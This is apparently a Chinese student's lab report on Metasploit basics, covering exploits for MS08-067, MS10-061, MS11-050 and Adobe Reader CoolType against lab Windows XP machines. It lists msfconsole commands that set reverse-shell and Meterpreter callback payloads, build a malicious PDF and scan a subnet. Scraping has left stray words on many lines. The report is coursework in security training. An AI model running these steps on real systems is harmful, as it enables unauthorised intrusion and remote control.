20145320 《網絡滲透》MSF基礎應用

20145320 《網絡滲透》MSF基礎應用

1.實驗後回答問題

  • exploit
    • 攻擊模塊,利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊。主要分爲主動攻擊和被動攻擊。像咱們此次作的實驗中,第一個是主動攻擊,第二三個均屬於被動攻擊。
  • payload
    • 攻擊載荷模塊,這個模塊實質是一段shellcode。在滲透成功以後,將程序流程劫持並跳轉入這段機器代碼中執行
  • encode
    • 編碼器模塊,首先是確保不會出現「壞字符」(如0x00字符串尾部,會截斷後面的內容)。其次是「免殺」,防止受到殺毒軟件的阻斷!

2.實驗總結與體會

這幾個實驗我發現就是在使用exploit攻擊模塊中不一樣的攻擊方法進行攻擊,並且流程基本都同樣。先使用search exploit/windows/smb/ms找到windows中的漏洞,而後看看其簡單的描述,選中其中一個使用info xxx查看其信息,主要看其可攻擊targets、描述、必須設置的參數。接下來設置payload,同時設置payload的參數,全部的參數都設置完畢以後就能夠進行exploit攻擊了!總的來講就是在使用metaspolit這個軟件提供的攻擊服務!!shell

在完成老師安排的任務以外,我還嘗試了:數據庫

ms06_066_nwapi


只差一步可惡!windows

下面這個是成功的!!!api

MS10_061遠程漏洞攻擊(主動攻擊)

use exploit/windows/smb/ms10_061_spoolss進入攻擊模塊瀏覽器

info查看

等級Excellent,發佈時間2010-09-14安全

目標機器:全部的windows平臺網絡


須要設置參數:目標地址和端口,可選:目標共享打印機名

描述:打印機漏洞session

被進攻的機器爲Windows xp中文版
其中xp中要有共享打印機,具體作法tcp

一、在控制面板中的---打印機和傳真---下有默認的Microsoft打印機,但好像並很差用(能夠嘗試下直接改屬性---端口爲COM1試試)。

二、VMware提供虛擬打印機,在com1口。

三、刪掉了默認的打印機(自願),而後,添加打印機---鏈接到次計算機的本地打印機(去掉勾選的自動檢測)---COM1口(VMware中查看便可)---打印機廠商默認便可---打印機名---共享---位置隨意可不填

四、重啓print Spooler服務(不重啓可能致使meta鏈接打印機失敗)

回到Linux中,設置相關參數後(要注意:set PNAME 爲目標打印機name),exploit攻擊成功!
測試

要攻擊一個有漏洞的主機簡直不過太簡單了!!!我感受修復一個漏洞所須要的時間尚未使用這個漏洞拿來攻擊所花費的時間長!!之後有補丁真的立刻安裝,我不再敢拖了。真的懼怕!

3.實踐過程記錄

MS08_067遠程漏洞攻擊實踐

輸入命令use exploit/windows/smb/ms08_067_netapi,info瞭解該漏洞模塊的使用。


windows平臺,等級great,補丁發佈時間2008-10-28


可攻擊的目標:windows 2003


須要設置的參數目標地址(RHOST)、目標端口(RPORT)、使用管道(SMBPIPE)


描述如上

輸入命令show payloads會顯示出有效的攻擊載荷,以下圖所示,咱們找到一個shell_reverse_tcp。

使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。

根據show options中必須設置的東西進行設置

輸入命令exploit開始攻擊,垂手可得的正常攻擊成功

中途我對老師給的中文版的windows xp進行攻擊,覺得成功了,沒想到看了同窗的博客發現是白開心一場

MS11-050漏洞攻擊

同上述步驟,第一步,查找相關漏洞信息

平臺winodows,等級Normal,補丁發佈時間2011-06-16

可攻擊的目標:XP或Vista的IE7和IE8

必須的參數:反彈地址(SRVHOST)、反彈端口(SRVPORT)

描述

使用show payloads指令查看可使用的負載

加載payload

set payload windows/meterpreter/reverese_http

設置相應參數,經過show options查看

set URIPATH ms5320  //設置訪問主頁的URI
set LHOST 192.168.47.130    //設置攻擊IP
set LPORT 8888  //設置攻擊端口

打開服務exploit,發起滲透攻擊

此時,在靶機中啓動IE 7瀏覽器,訪問連接:http://192.168.47.130:8080/ms5320

與此同時,在攻擊機的MSF終端中,能夠看到以下信息:

輸入sessions能夠看見正在監聽端的活動會話


發現1端口正在監聽,使用session -i 1接入ID號爲1的當前靶機回連的會話


攻擊成功!

Adobe滲透測試過程

這個滲透攻擊模塊的路徑爲windows/fileformat/adobe_cooltype_sing,使用info查看該模塊的內容

能夠看到這個漏洞是存在於8.2.4和9.3.4版本的Adobe Reader中,於2010-09-07發佈的補丁,等級是Great。

咱們進入該模塊設定相關係數並生成相關文件5320.pdf

將生成的pdf文件導入到windows XP Attacker靶機中運行,回連成功!

這個這個pdf的內容,內容並不可疑!

輔助模塊

先手動建立一個msf所需的數據庫

輸入命令 use auxiliary/scanner/discovery/arp_sweep進入模塊

show options查看須要設置的消息,其中rhosts填寫本身電腦所在網段

設置必要參數

set RHOSTS 172.30.1.0/21

set threads 2

命令run開啓掃描,結果能夠看到除了本身主機的IP,還有其餘ip

相關文章
相關標籤/搜索